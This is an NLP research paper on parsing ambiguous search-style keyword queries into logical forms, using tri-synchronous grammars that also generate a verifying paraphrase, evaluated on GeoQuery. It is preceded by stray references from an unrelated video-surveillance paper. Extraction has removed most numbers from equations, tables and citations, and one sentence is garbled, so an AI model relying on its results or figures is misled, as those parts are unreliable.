sequences[j]. ieee transactions on image processing, , ( ): - . [ ] hu changhui, lu xiaobo, ye mengjun, zeng weili. singular value decomposition and local near neighbors for face recognition under varying illumination [j]. pattern recognition, , : - . [ ] z. qiming and m. chengqian, a vehicle detection method in tunnel video based on vibe algorithm, ieee nd advanced information technology, electronic and automation control conference (iaeac), chongqing, , pp. - . [ ] c. pan, z. zhu, l. jiang, m. wang and x. lu, "adaptive vibe background model for vehicle detection," ieee nd advanced information technology, electronic and automation control conference (iaeac), chongqing, , pp. - . [ ] ekpar f. a framework for intelligent video surveillance. proceedings of the ieee th international conference on computer and information technology workshops. sydney, qld, australia. . – . semantic parsing of ambiguous input through paraphrasing and verification philip arthur, graham neubig, sakriani sakti, tomoki toda, satoshi nakamura graduate school of information science, nara institute of science and technology, japan {philip.arthur.om , neubig, ssakti, tomoki, s-nakamura}@is.naist.jp abstract we propose a new method for semantic pars- ing of ambiguous and ungrammatical input, such as search queries. we do so by build- ing on an existing semantic parsing framework that uses synchronous context free grammars (scfg) to jointly model the input sentence and output meaning representation. we gener- alize this scfg framework to allow not one, but multiple outputs. using this formalism, we construct a grammar that takes an ambigu- ous input string and jointly maps it into both a meaning representation and a natural lan- guage paraphrase that is less ambiguous than the original input. this paraphrase can be used to disambiguate the meaning representa- tion via verification using a language model that calculates the probability of each para- phrase. introduction semantic parsing (sp) is the problem of parsing a given natural language (nl) sentence into a meaning representation (mr) conducive to further processing by applications. one of the major challenges in sp stems from the fact that nl is rife with ambiguities. for example, even the simple sentence “where can we eat a steak in kobe?” contains syntactic ambi- guities (“eat in kobe” or “steak in kobe”?), quan- tifier scope ambiguities (do we all eat one steak, or each eat one steak?), and word sense ambigui- ties (is kobe a city in japan; or an nba basketball tools to replicate our experiments can be found at http://isw .naist.jp/~philip-a/tacl /index.html. player?). previous works using statistical models along with formalisms such as combinatorial cat- egorial grammars, synchronous context free gram- mars, and dependency based compositional seman- tics have shown notable success in resolving these ambiguities (zettlemoyer and collins, ; wong and mooney, ; liang et al., ; kwiatkowski et al., ). much previous work on sp has focused on the case of answering natural language queries to a database of facts, where the queries generally take the form of full sentences such as “what is the height of kobe bryant?” while answering these ques- tions provides an excellent first step to natural lan- guage information access, in many cases the input is not a full sentence, but something more underspec- ified and ungrammatical. for example, this is the case for keyword-based search queries (sajjad et al., ) or short dialogue utterances (zettlemoyer and collins, ). specifically taking the example of search queries, users tend to omit some of the function words and grammatical constructs in the language to make a more concise query. the first column of table illustrates several search queries of the pattern “kobe x” where x is another word. from these queries and their mrs in column two, we can see that there are several kinds of ambiguity, including not only the distinction between kobe as city or a basketball player as in the previous example, but also more pernicious problems unique to the more ambiguous input. focusing on the queries “kobe hotels” and “kobe flight” we can see that it is also necessary to estimate the latent relationship between search query meaning representation paraphrase kobe hotel λx (hotel(x) ∧ in(x, kobe city)) hotel in kobe city kobe flight λx (flight(x) ∧ to(x, kobe city)) flight to kobe city kobe height height(kobe bryant) height of kobe bryant table : example of a search query, mr, and its paraphrase words, such as “location” or “destination.” however it should be noted that if we take the keyword query and re-express it as a more explicit paraphrase, we can reduce this ambiguity to the point where there is only one reasonable interpretation. for example, in the second line, if we add the preposition “to” the user is likely asking for flights that arriving in kobe, and if we add “from” the user is asking for depar- tures. in this paper, we focus on sp of ambiguous input and propose a new method for dealing with the prob- lem of ambiguity. here we propose a framework where an ambiguous input (column in table ) is simultaneously transformed into both its mr (col- umn ) and a more explicit, less ambiguous para- phrase (column ). the advantage of this method is that it is then possible to verify that the paraphrase indeed expresses the intended meaning of the under- specified input. this verification can be done either manually by the system user or automatically using a probabilistic model trained to judge the naturalness of the paraphrases. as a concrete approach, building upon the formal- ism of synchronous context free grammars (scfg). unlike traditional scfgs, which usually only gen- erate one target string (in semantic parsing, an mr), we introduce a new variety of scfgs that generate multiple strings on the target side. this allows us to not only generate the mr, but also jointly gen- erate the more explicit paraphrase. we then use a language model over the paraphrases generated by each derivation to help determine which derivations, and consequently which mrs, are more likely. we perform an evaluation using the standard geo- query benchmark of query-logic pairs. first we note that baseline scfg parser achieves reasonable accuracy on regular questions but when the same method is used with underspecified input, the system accuracy decreases significantly. on the other hand, when incorporating the proposed tri-synchronous grammar to generate paraphrases and verify them with a language model, we find that it is possible to recover the loss of accuracy, resulting in a model that is able to parse the ambiguous input with signif- icantly better accuracy. semantic parsing using context free grammars as a baseline sp formalism, we follow wong and mooney ( ) in casting sp as a problem of trans- lation from a natural language query into its mr. this translation is done using synchronous context free grammars, which we describe in detail in the following sections. . synchronous context free grammars synchronous context free grammars are a general- ization of context-free grammars (cfgs) that gener- ate pairs of related strings instead of single strings. slightly modifying the notation of chiang ( ), we can formalize scfg rules as: x → ⟨γs, γt⟩ ( ) where x is a non-terminal and γs and γt are strings of terminals and indexed non-terminals on the source and target side of the grammar. scfgs have recently come into favor as a tool for statistical machine translation (smt). in smt, a synchronous rule could, for example, take the form of: x → ⟨x eats x , x wa x wo taberu⟩ ( ) where γs is an english string and γt is a japanese string. each non-terminal on the right side is in- dexed, with non-terminals with identical indices cor- responding to each-other. given the scfg grammar, we can additionally as- sign a score to each rule, where higher scored rules are more likely to participate in a derivation. given the grammar of scored rules, and an input sentence grammar r query → ⟨give me the conj , answer(x , conj )⟩ r conj → ⟨form form state , (form , form , const(x , stateid(state ))⟩ r form → ⟨cities, city(x )⟩ r form → ⟨in, loc(x , x )⟩ r state → ⟨virginia, virginia⟩ derivations ⟨query , query ⟩ r ⇒ ⟨give me the conj , answer(x , conj ))⟩ r ⇒ ⟨give me the form form state , answer(x , (form , form , const(x , stateid(state ))))⟩ r ⇒ ⟨give me the cities form state , answer(x , (city(x ), form , const(x , stateid(state )))⟩ r ⇒ ⟨give me the cities in state , answer(x , (city(x ), loc(x ,x ), const(x , stateid(state )))⟩ r ⇒ ⟨give me the cities in virginia, answer(x , (city(x ), loc(x , x ), const(x , stateid(virginia)))⟩ figure : example of sp using scfgs. the left hand and right hand sides are generated simultaneously. s, the highest scoring parse and output sentence t can be calculated using the cky+ algorithm (chi- ang, ). . semantic parsing with scfgs in the simplest form of sp with scfgs, γs is used to construct a natural language string s and γt is used to construct the mr t (wong and mooney, ). figure shows an example of using an scfg to si- multaneously generate a natural language string and its mr. in this picture, the bold symbols are non- terminals which can be substituted with other non- terminal productions. productions end when all the tokens are terminals. the collection of rules used to generate a particular ⟨s,t ⟩ pair is a derivation d= d , d , ..., d|d|. wong and mooney ( ) further extended this formalism to handle λ-scfgs, which treat γs as the natural language query and γt as an mr based on λ calculus. scfg rules are automatically learned from pairs of sentences with input text and the corre- sponding mr, where the mr is expressed as a parse tree whose internal nodes are predicates, operators, or quantifiers. in this paper, we follow li et al. ( )’s approach to extract a grammar from this parallel data. in this approach, for each pair, statistical word alignment aligns natural language tokens with the correspond- ing elements in the mr, then according to the align- ment, minimal rules are extracted with the ghkm algorithm (galley et al., ; li et al., ). then, up to k minimal rules are composed to form longer rules (galley et al., ), while considering the re- lationship between logical variables. finally, un- aligned nl tokens are aligned by attaching them to the highest node in the tree that does not break the consistencies of alignment, as specified in galley et al. ( ). . additional rules while basic rules extracted above are quite effective in parsing the training data, we found several prob- lems when we attempt to parse unseen queries. to make our parser more robust, we add two additional varieties of rules. first, we add a deletion rule which allows us to delete any arbitrary word w with any head symbol x, formally: x → ⟨w x, x⟩. ( ) this rule allows our grammar an option of ignoring words that it does not know what to do with. we achieve almost % f-measure in closed testing. in addition, to ensure that all of the facts in the database can be accessed by our semantic parser, we provide some additional scfg rules based on the given database of facts. the geoquery dataset pro- vides a database of facts represented as logical asser- tions. for every assertion provided in the database, we produce a single rule using the function name as the label of the non-terminal and one parameter of the assertion as the terminal, depending on the asser- tion’s type. for example, geoquery provides some details about the state of michigan with the form state(’michigan’,...), and thus we add state → ⟨michigan, michigan⟩ as an additional rule in the grammar. semantic parsing of keyword queries as explained in section , when users input key- word queries, they will often ignore the grammatical structure and omit function words. based on this, a traditional sp model can be problematic. to give a concrete example, consider the synchronous parse in figure . if we try to parse with only the keywords (e.g. “cities virginia”) with a standard grammar, the parser will not be able to recover the latent relation- ship “loc(x , x )” between the two words. unfortu- nately, we are lacking evidence to recover this re- lationship, because the token “in” associated with the predicate “loc” will often not occur in a keyword query. in this work, we perform experiments on this par- ticular variety of ambiguous input, both to examine the effect that it has on parsing accuracy under the baseline model, and to examine whether this sort of ambiguity can be reduced. in order to do so, we need examples of keyword queries. in this work, we sim- ulate the keyword query k by altering the original question s to make it more closely match the style of keyword queries. in particular, following the analy- sis of leveling ( ), we make two changes to the original queries: stop word deletion, and word order shuffling. stop word deletion, as its name implies, sim- ply deletes all stop words from the input sentence. we use a stop word list, making a few subjective changes to make the simulated keyword output more http://www.lextek.com/manuals/onix/stopwords .html realistic. specifically, we add “give” and “show,” which often occur in statements such as “give me ...” or “show me ...” but are unnatural in keyword queries. we also exclude from the list “us,” which often refers to “united states,” and function words such as “many,” “most,” and “much.” word order shuffling permutes the order of the keywords remaining after stop word deletion, to simulate the fact that keyword queries often don’t have strict order. first we shuffled the tokens ran- domly, then had a human annotator fix the order of the keywords manually, making the minimal num- ber of changes necessary to ensure that the queries are natural and fluent. this produced a single key- word query k for a particular question/mr pair in the geoquery database, which will be used to train and verify our system. at the end we will have a - parallel corpus consisting of pairs of keyword, question, and the meaning representation. we should note that while shortening and reorder- ing are prominent features of search queries (lev- eling, ), these are not the only phenomenon distinguishing queries from standard text. for ex- ample, humans tend to also change content words into an equivalent and easier word of their prefer- ence (gurský et al., ). while collecting this data is out of the scope of the present work, if a cor- pus of real keyword inputs and question paraphrases were available, it is theoretically possible for our proposed method to learn from this data as well. joint semantic parsing and paraphrasing using tri-synchronous grammars in this section we describe our proposed method to parse underspecified and ungrammatical input while jointly generating a paraphrase that can be used to disambiguate the meaning of the original query. . generalized synchronous context free grammars before defining the actual parsing framework, we first present a generalization of scfgs, the n- synchronous context free grammar (n-scfg) (neu- big et al., ). in an n-scfg, the elementary structures are rewrite rules of n − target sides: x → ⟨γ , γ , ..., γn⟩ ( ) grammar r query → ⟨conj , give me the conj , answer(x , conj )⟩ r conj → ⟨form state , form in state , (form , loc(x , x ), const(x , stateid(state )))⟩ r form → ⟨cities, cities, city(x )⟩ r state → ⟨virginia, virginia, virginia⟩ derivations ⟨query , query , query ⟩ r ⇒ ⟨conj , give me the conj , answer(x , conj )⟩ r ⇒ ⟨form state , give me the form in state , answer(x , (form , loc(x , x ), const(x , stateid(state ))) ⟩ r ⇒ ⟨cities state , give me the cities in state , answer(x , (city(x ), loc(x , x ), const(x , stateid(state )))⟩ r ⇒ ⟨cities virginia, give me the cities in virginia, answer(x , (city(x ), loc(x , x ), const(x , stateid(virginia)))⟩ figure : an example of -scfg rules and productions. here there are target sides, one is the paraphrase and the other is the mr where x is a non-terminal symbol, γ is the source side string of terminal and non-terminal symbols, and γ , ...γn are the target side strings. therefore, at each derivation step, one non-terminal in γ is cho- sen and all the corresponding non-terminals with the same index in {γ , ..., γn} are rewritten using a sin- gle rule. . tri-synchronous grammars for joint parsing and paraphrasing based on this framework, we propose a model for joint semantic parsing and paraphrasing using tri- synchronous grammars, or -scfgs. in this frame- work, input γ corresponds to a keyword query k, and the outputs γ and γ correspond to the para- phrase and mr respectively. an example of jointly generating a keyword query, question, and mr with a -scfg is shown in figure . in this work, we construct the tri-synchronous grammar by transforming the basic scfg for se- mantic parsing g into a -scfg. specifically, we first assume that the source question γs and target mr γt of the original scfg become the two out- puts γ and γ of the new -scfg grammar. γ is the newly added keyword query input. during the process of model training, we first ex- tract rules consisting of γ and γ using the algo- rithm in section . , then generate γ from γ by first deleting the stop-words then rearranging the or- der of the words based on word alignments between the keyword query and the original question. this is done by assigning each word in k a range of words in s to which it is aligned, then sorting words in γ in ascending order of these ranges. it is possible to have cases in which there are some words in k that have no alignment in s, and these rules are filtered out. finally, we use the tuple ⟨γ , γ , γ ⟩ to form rules in our tri-synchronous grammar. because of the stop word deletion, we may find that some rules have an empty source side, and con- sequently cannot be used in an scfg. for example, in r in figure , “in” is in the stop word list, and thus will be deleted from the source side, leaving it empty. in order to solve this problem, we compose all rules with empty inputs together with their parent rule. it should be noted that this introduces a large amount of ambiguity into the grammar, as the con- tent represented by the deleted content word must now be generated essentially out of thin air, based only on its parent context. . integrating language models with tri-scfgs when using scfgs for machine translation, the power of language models (lm) to improve the translation accuracy is widely acknowledged. the lm ensures fluent smt output by assigning a prob- ability to the target sentence. in case of n-gram lan- guage models, this probability is defined as: plm(w) = l∏ i= p(wi|wi− , wi− , ...wi−n+ ) ( ) where the probabilities of sentence w of length l is calculated as the product of the probability of its words, depending on the previous n − words. in- tegrating these language models makes the search space larger, precluding the use of the full cky-style parsing algorithm, but efficient approximate search algorithms such as cube pruning (chiang, ) or incremental search (heafield et al., ) can help ameliorate this problem. we could also consider constructing a probabilis- tic lm over mr t for semantic parsing. however, constructing a language model for the mr is less straightforward for several reasons. first, the order of the words of mr in the same rooted logical tree will not make a difference in the final result (e.g. for a commutative operator node). second, while lan- guage models for natural text benefit from the large amounts of text data available on the web, obtaining correct mrs to train a model is less trivial. on the other hand, in our tri-synchronous gram- mar framework, in addition to the mr itself, we are generating a paraphrase that nonetheless holds some disambiguating power over the mr, as described in section . the naturalness of this paraphrase out- put, like the output of the mt system, can easily be judged by a language model, and might have some correlation with the naturalness of the mr itself. thus, in this work we add a language model over the paraphrase output as a feature of the scoring model described in the next section. parse scoring given this scfg-based parsing model, we must now assign a score to decide which scores are bet- ter or worse than others. . scoring function our scoring function is a standard log linear model with feature functions defined over ⟨k,s,t ,d⟩ tu- ples: score(k,s,t ,d) = w · Φ(k,s,t ,d) ( ) where Φ(k,s,t ,d) is a vector of feature functions and w is the weight vector. . features for the baseline model, our feature vector Φ(k,s,t ,d) is simply defined as the element-wise sum of the feature vectors for each rule in the deriva- tion: Φ (k,s,t ,d) = ∑ d∈d Φ (d) ( ) where d takes the form in equation ( ). we score each basic rule using features widely used in translation as follows: • forward probability: the log probabil- ity of source side given all the target sides p(γ |γ , ..., γn), calculated based on rule counts in the training corpus c(γ , ..., γn)/c(γ , ..., γn). • backward probability: similarly, the log prob- ability of all target sides given the source side p(γ , ..., γn|γ ). • joint probability: the log probability of the source and target p(γ , γ , ..., γn). • terminal rule: equal to one if there is no non- terminal symbol in the rule. this feature is use- ful to decide whether the model prefers entirely lexicalized rules. • deletion: binary feature for deletion rules. • knowledge base rule: binary feature for rules produced from the knowledge base. for the proposed tri-synchronous grammar with lm verification, we additionally add three features defined over the generated paraphrase. • language model: counts the log language model probability of the paraphrase. • unknown: counts the number of tokens in the paraphrase that are unknown in the language model. • paraphrase length: counts the number of words in the paraphrase, and can be calculated for each rule as the number of terminals in the paraphrase. this feature helps compensate for the fact that language models prefer shorter sentences. . learning feature weights now that we have defined the feature space, we need to optimize the weights. for this we use minimum error rate training (mert) (och and ney, ), maximizing the number of correct answers over the entire corpus. experiment and analysis we evaluate our system using the geoquery corpus (zelle and mooney, ), which contains sen- tences representing natural language questions about u.s. geography, and their corresponding mrs. . setup • data: we use the full geoquery dataset us- ing the same folds of and test data used by wong and mooney ( ). we cre- ated keyword queries according to the process described in section . we follow standard pro- cedure of removing punctuation for all natural language text, regardless of whether it is a key- word or full question. we also perform stem- ming on all natural language text, both in the keyword and question queries. • rule extraction: alignment is performed by pialign (neubig et al., ) with the set- ting forcing one-to-many alignments. the al- gorithm to extract the tri-synchronous grammar is as discussed in section . and maximum size of the rules for composition is . • decoding: to query the database, we use prolog queries fired against the geoquery we also tried gradient-based optimization methods and large feature sets as in wong and mooney ( ) and li et al. ( ), but the dense feature set and mert achieved similar results with shorter training time. database. the parsing problem can thus be con- sidered the task of decoding from underspec- ified natural language queries into prolog queries. this is done by performing decoding of the scfg-based parsing model to translate the input query into an mr including λ calculus expressions, performing β-reduction to remove the λ function, then firing the query against the database. before querying the database, we also apply wong and mooney ( )’s type- checking to ensure that all mrs are logically valid. for parsing, we implemented cky- based parsing of tri-synchronous grammars on top of the travatar (neubig, ) decoder. unless otherwise specified, the default settings of the decoder are used. • language model: for all -scfg systems we use a -gram kneser-ney smoothed lan- guage model trained using the kenlm toolkit (heafield, ). standard preprocessing such as lowercasing and tokenization is performed before training the models. as it is of inter- est whether or not the type of data used to train the language model affects the resulting perfor- mance, we build language models on several types of data. first, we use a corpus of news data from the workshop on machine translation evaluation data (callison-burch et al., ) (news). this data represents standard english text unrelated to questions. second, we use a part of the question paraphrase data gathered by fader et al. ( ) (questions). this data consists entirely of questions, and thus is a better rep- resentative of the latent questions behind the input queries. finally, we used the full ques- tions from geoquery sentences to build the language model, building a different language model for each fold, completely separate from the test set. table gives the details of each dataset. in addition, because the geoquery data is useful but small, for all -scfg systems, we perform experiments using an additional - we use only data set from the sets released at http://knowitall.cs.washington.edu/afader/paraphrases. data sent. tok. lm size news . m m . g questions . m m . g geoquery ∼ . k ∼ k table : details of the data used to build lms gram feed-forward neural network language model (nnlm) (bengio et al., ) feature, which is possibly better equipped to handle sparse data than standard n-grams. the nnlm is built on geoquery sentences, excluding the test sentences for each fold. this feature is not produced during parsing, but is separately scored and used to re-rank the n-best list gen- erated by the parser. integration with the paraphrase language model is performed using incremental search (heafield et al., ). for the parsing with nnlm, we recalculate the score of the para- phrases by firstly adding the nnlm score as one of the feature in equation and taking the parse with the best score. • parameter optimization: for learning the pa- rameters of the scoring function we use -fold cross validation on the training data, i.e. each fold iteration uses model trained on exam- ples and to parse the remaining . first we run decoding for all folds and gather the results. then we run mert with the combined results to update the parameters. we use the standard evaluation measure of question answering ac- curacy as our objective function and set the n- best list to be the top derivations. to learn the weights for rescoring with the nnlm, we first generate an n-best list with the base model not using the nnlm feature. we then calculate the nnlm feature for each hy- pothesis in the n-best list, and run one more run of mert with this feature to obtain the weights used in the rescoring model. • evaluation: following the definition from zettlemoyer and collins ( ) and wong and mooney ( ), we use question answering ac- curacy as our evaluation measure. we define recall as the fraction of correct answers divided by the number of test data, precision as the frac- tion of correct answers divided by the number of parsed queries and f-measure as the har- monic mean of the two. the query is judged correct if and only if the scfg can gener- ate a valid parse tree, and the resulting query does not produce any syntax errors when ac- cessing the database through a prolog query. note that all questions are used for testing through cross validation, so a recall improve- ment of . is approximately equal to an- swering one more question correctly. . parsing accuracy results input method p r f question direct . . . keyword direct . . . tri-lm . . . tri+lm . . . table : parsing accuracy, where keyword direct is the baseline for semantic parsing on keyword queries, and the tri with the lm for verification is our proposed method. bold indicates a significant gain over both direct and tri- lm for keyword input according to bootstrap resampling (koehn, ) (p < . ). first, in this section, we examine the effect of the proposed method on accuracy of parsing ambiguous keyword queries. specifically, in table we show the baseline “direct” method of training a standard scfg-based semantic parser, the proposed method without language model verification “tri-lm,” and the proposed method using the questions lan- guage model with nnlm reranking “tri+lm.” looking at the baseline accuracy over full ques- tions (first row), we can see the recall is slightly su- perior to wong and mooney ( )’s . % and li et al. ( )’s . %, demonstrating our baseline is comparable to previous work. when we apply the same method to parse the keyword queries (second row), however, the recall drops almost %, showing that the ambiguity included in the keyword query in- put causes large decreases in accuracy of a semantic parser built according to the baseline method. this ambiguity is also reflected in the number of mrs generatable by the parser for any particular input. in the top list generated by each parser, there were ex. lm paraphrase/mr correct direct answer(a,(capital(a),loc(a,b),largest(c,population(b,c)))) no tri-lm answer(a,largest(b,(capital(a),population(a,b)))) yes tri+lm what capital has the largest population original question: what capital has the largest population original mr: answer(a,largest(b,(capital(a),population(a,b)))) keyword: largest population capital direct(-) answer(a,largest(a,(capital(a),city(a),loc(a,b),state(b)))) no tri-lm answer(a,largest(a,(state(a),loc(a,b),capital(b)))) no what is the largest state in capital tri+lm answer(a,(state(a),loc(b,a),largest(b,capital(b)))) yes what state has the largest capital original question: what state has the largest capital original mr: answer(a,(state(a),loc(b,a),largest(b,capital(b)))) keyword: largest capital state table : examples of paraphrase outputs produced by the direct keyword-mr system, and the proposed systems without and with a language model. a total of . and . unique mrs for question and keyword input respectively. now we take a look at the -scfg (third row) without the lm verification, we can see the results are similar to the baseline. then, when adding the language model to the -scfg system (fourth row) we can see a significant of - % gain over the di- rect and the tri-lm systems, demonstrating that the proposed method of paraphrasing and verification is indeed able to resolve some of the ambiguity in the keyword queries. to illustrate how the language model helps, we provide two examples in table . the first example shows that considering the original question when parsing from keywords can help improve alignment with the mr for more plausible results. the sec- ond example shows the effect of adding the language model to disambiguate the keyword query. here there are several interpretations for the keyword- query “largest capital state,” which also can mean “state that has the largest capital,” or “largest state in the capital.” the system without the language model incorrectly chooses the latter interpretation, but the system with language model correctly dis- ambiguates the sentence as it considers the phrase “state in capital” is unlikely, showing the effective- ness of our method. . analysis we first examine the effect of choice of language model in the first two columns of table . the first column is the full model with nnlm re-ranking, and the second column is without. the rows show the effect of using different data to train the n-gram lm. all the systems using lms are basically bet- ter than the system using neither an n-gram lm nor the nnlm. looking at the differences between the n-gram lms, we can see that the questions lm tends to be the most effective. this is particularly encouraging as the questions language model does not contain any domain specific content, but is able to outperform the geoquery domain spe- cific lm. we also found that, as expected, the more sophisticated neural network language model raises the system accuracy by approximately %, which also supports our proposed idea that a better lm will better raise system accuracy. the proposed method aims at reducing nonsen- sical interpretations, and another trivial baseline that can achieve a similar effect is to filter out the queries that produce empty answers, with the as- sumption that empty answers are generated from in- valid queries. this simple filtering method reduced the number of unique queries to . for questions and . for keywords. however, as shown in the “-empty” results in table , we found that this fil- input output lm full -nnlm -empty p r f p r f p r f keyword q+mr - . . . . . . . . . news . . . . . . . . . quest . † . † . † . . . . . . geo . . . . . . . . . table : the result of experiment with/without neural network language model for the proposed -scfg framework. question-lm +nnlm achieved the best accuracy. bold indicates a significant gain over the baseline direct keyword (second row of table ) and dagger indicates a significant gain over the -scfg baseline without language model (-nnlm column, first row). the full and -empty column use nnlm as language model. the first row of the -nnlm column is the experiment without any language model. tering method is not effective, causing the system’s performance to drop by around %. this is caused by the fact that the correct answer is sometimes an empty answer, for example “what states border hawaii?” . human evaluation while all evaluation up to this point has used lan- guage models to disambiguate paraphrases, we can assume that human users will be even better at judg- ing whether or not a paraphrase makes sense. thus, we perform an additional evaluation in which hu- man annotators evaluate the paraphrases generated from the systems. first, we took the -best parse and random parses from the tri+lm and tri-lm systems where both systems produced a non-empty n-best. then we show both the keyword queries and all the paraphrases to human evaluators to annotate: i) a fluency score of , , or where is completely unnatural english, indicates minor grammatical errors, and indicates flawless english, ii) a letter starting from “a”, “b”, etc. for the paraphrase that matches their preferred interpretation of the search query. if the input has multiple interpretations, then a different letter is assigned for each possible inter- pretation in the order that the annotator believes that the interpretation is the correct one, and only para- phrase paraphrase is chosen for each interpretation. if the human annotator does not find the paraphrase that matched his/her pboth features set.igned and an- notation starts from “b.” annotators were asked to annotate keyword queries and their paraphrases. here the letters are just the indicators of ranking with a let- ter “a” means the most possible interpretation of search queries according to the users. there are a total of keyword queries (out of ) that produced a non-empty n-best list in both sys- tems, so we chose random duplications of inputs to make the sum . system precision tri-lm . tri+lm . tri+lm+human . table : system precision with additional human help. table shows the improvement of the system with human help. we take all the answers from the annotators that were annotated with “a” and re- placed the answer of tri+lm system. overall, there were questions that changed between the -best and human choices, with improving and de- grading accuracy. this experiment suggests that it is possible to show the generated paraphrases to hu- man users to improve the accuracy of the semantic parser. system fluency ratio precision tri-lm . . . . . . tri+lm . . . . . . table : fluency, ratio, and precision statistics for the one-best of both systems. now we look at the relationship between the flu- ency of the paraphrase and the accuracy of the se- mantic parsers in table . the statistics are gathered letter system count total precision a tri-lm . tri+lm . b tri-lm . tri+lm . c tri-lm . tri+lm . d tri-lm . tri+lm . table : a result for the letter accuracy from the human evaluation. note that counts do not sum up to total be- cause it is possible that both systems generate same para- phrases. from the one best output for both systems. tri+lm had a significantly larger percentage of fluent para- phrases with score “ ” ( % v.s. %) compared to the system without the language model. of the paraphrases that were assigned “ ” score, % cor- responded to correct mrs, indicating that the sub- jective fluency of the paraphrase is a good indicator of parsing accuracy. finally, table shows the relationship between the rank of the human interpretation and the accu- racy of semantic parsing. out of the problems shown to the annotators, of them were ranked “a.” this experiment showed that the interpretation of the paraphrase judged as most likely by the anno- tators achieves a high precision, confirming our hy- potheses that humans are able to use paraphrases to accurately judge whether the interpretation is likely to be correct or not. . other methods for using paraphrase data in addition to the method describe up until this point, there are several other ways to potentially incorpo- rate paraphrasing into syntactic parsing of under- specified input. in this section we briefly outline two other (unsuccessful) attempts to do so: creation of a pipelined paraphrasing/semantic parsing sys- tem, and addition of features from a large paraphrase database. first, regarding the pipelined system, we build the paraphrasing system using the parallel keyword- question data, with standard settings of hierarchical phrase-based translation (chiang, ), and stan- dard smt features. we use the geoquery n-gram model for the language model used during decoding and nnlm language model to finally rerank the n- best list. as a result of experiments, even though this system obtained a respectable bleu score of . , the parsing accuracies were much lower than the direct keyword-mr system at . f-measure. an analysis showed that, perhaps as expected, this was caused by cascading errors, with unnatural para- phrases also resulting in failed semantic parses. in addition, we also attempted to use the external questions data to calculate additional features to our tri+lm system. we do this by first simulat- ing the keyword version for each sentence in the questions data by performing shuffling and stop- word deletion. next we train a hierarchical phrase-based system on this data to create a paraphrasing model. next we intersect this model with our existing model by matching the source side and the target side of the rules and if they match, taking the union of the fea- tures sets. unfortunately, however, this setting also did not allow for a gain in accuracy, likely due to to the low recall ( %) of the matching between paraphrasing grammar and semantic parsing rules. this low recall stemmed from a number of factors including restrictions on the standard hiero para- phrasing grammars (no more than non-terminals, no consecutive non-terminals on the source side, and no rules without at least one terminal), as well as simple lack of coverage of the words in the para- phrase database. this result does indicate room for improvement by developing algorithms that extract paraphrases that are closely related to the semantic parsing rules, but also suggests potential difficulties in simply applying paraphrasing resources such as ppdb (ganitkevitch et al., ). related work interpretation of search queries is a major concern in the field of information retrieval as it can affect the choice of retrieved documents. underspecified queries are commonly entered into search engines, leading to large result sets that are difficult for users because the shuffling process is random we could conceiv- ably generate and train with multiple shuffled versions, but be- cause the questions data is relatively large already, we only train the paraphrasing system with the single permutation of keywords generated by the shuffling. to navigate (sajjad et al., ). studies have shown that there are several ways to deal with this problem, including query reformulation, which can fall in the categories of query expansion or query substitution (shokouhi et al., ; xue and croft, ). lev- eling ( ) proposed a paraphrasing method that tries to reconstruct original questions given keyword inputs in the ir context, but did not model this re- formulation together with semantic parsing. in ad- dition, wang et al. ( ) showed that doing para- phrasing on the queries for web search is able to re- duce the mismatch between queries and documents, resulting in a gain in search accuracy. using paraphrasing to resolve ambiguity is not new, as it was used to resolve ambiguity interac- tively with a user’s input (mckeown, ). ge and mooney ( ) and miller et al. ( ) have also used the guidance of natural language syntax for semantic parsing. however, the usage of natu- ral language syntax in the semantic parsing on key- word queries are not trivial. for example, the ap- proach using syntax tree of the input side from ge and mooney ( ) can not be directly applied to the keyword query as syntax parsing on keyword query itself is not a trivial problem. there have also been a few methods proposed to combine paraphrasing with semantic parsing. fader et al. ( ) proposed a method to map from full questions to more canonical forms of these ques- tions, with the canonical nl questions being triv- ially convertible to an mr. berant and liang ( ) extract entities from a full-text question, map these entities into a set of candidate mrs, and generate canonical utterances accordingly. then the canoni- cal utterance that best paraphrases the input is cho- sen, thereby outputting the corresponding mr. our approach is the similar but orthogonal to these works in that we focus on situations where the original user input is underspecified, and try to generate a natu- ral language paraphrase that more explicitly states the user intention for disambiguation purposes. a second difference is that we do not use separate model to do paraphrasing, instead using the same model to do paraphrasing and semantic parsing syn- chronously. this has the advantage of being able to scale more easily to complicated and highly com- positional questions such as the ones found in geo- query. in addition to being useful for semantic parsing, scfgs have also been used for paraphrasing. a va- riety of research has used scfg-based paraphrases for text-to-text generation tasks like sentence com- pression (cohn and lapata, ; ganitkevitch et al., ), or expanding the set of reference transla- tions for machine translation evaluation (madnani et al., ). in this paper we have introduced a novel use of -way scfgs that allows us to simultane- ously do semantic parsing and text-to-text genera- tion. to our knowledge, this is the first method to parse an underspecified input by trying to reconstruct a more explicit paraphrase of the input and validate the naturalness of the paraphrase to disambiguate the meaning of the original input. conclusion and future work in this paper we introduced a method for construct- ing a semantic parser for ambiguous input that para- phrases the ambiguous input into a more explicit form, and verifies the correctness using a language model. we do so through a generalization of syn- chronous context free grammars that allows for gen- eration of multiple output strings at one time. an evaluation showed that our method is effective in helping compensate for the % loss of system accu- racies due to the ambiguity of the keyword queries, providing a % improvement. human evaluation also confirmed that manually evaluating the para- phrases generated by our framework can improve the accuracy of the semantic parser further. there are a number of future directions for this study. first, we plan to scale the proposed method to open domain semantic parsing of search queries over extensive knowledge bases such as freebase (bollacker, ). in addition, previous works have tackled semantic parsing directly from question and answer pairs (liang et al., ; poon and domin- gos, ; artzi and zettlemoyer, ). the idea of learning from unannotated data is attractive, and incorporating this learning framework into our model is a promising direction for future work. acknowledgments we thank professor yuji matsumoto and assistant professor kevin duh for the discussions and insight- ful ideas for the paper. we also thank professor chris callison-burch and anonymous reviewers for their suggestions and discussions. this project is supported by grants from the min- istry of education, culture, sport, science, and technology of japan and from the microsoft core program. references yoav artzi and luke zettlemoyer. . bootstrapping semantic parsers from conversations. in proceedings of the conference on empirical methods in nat- ural language processing (emnlp), pages – . yoshua bengio, ducharme réjean, pascal vincent, and christian janvin. . a neural probabilistic lan- guage model. the journal of machine learning re- search, : – . jonathan berant and percy liang. . semantic pars- ing via paraphrasing. in proceedings of the th an- nual meeting of the association for computational linguistics (acl), pages – . kurt bollacker. . a platform for scalable, collabo- rative, structured information integration. in proceed- ings of the nd association ofr advancement of arti- ficial intelligence, pages – . chris callison-burch, philipp koehn, christof monz, and omar f zaidan. . findings of the work- shop on statistical machine translation. in proceedings of the sixth workshop on statistical machine transla- tion, pages – . david chiang. . hierarchical phrase-based transla- tion. computational linguistics, ( ): – . trevor cohn and mirella lapata. . sentence com- pression as tree transduction. journal of artificial in- telligence research (jair), : – . anthony fader, luke zettlemoyer, 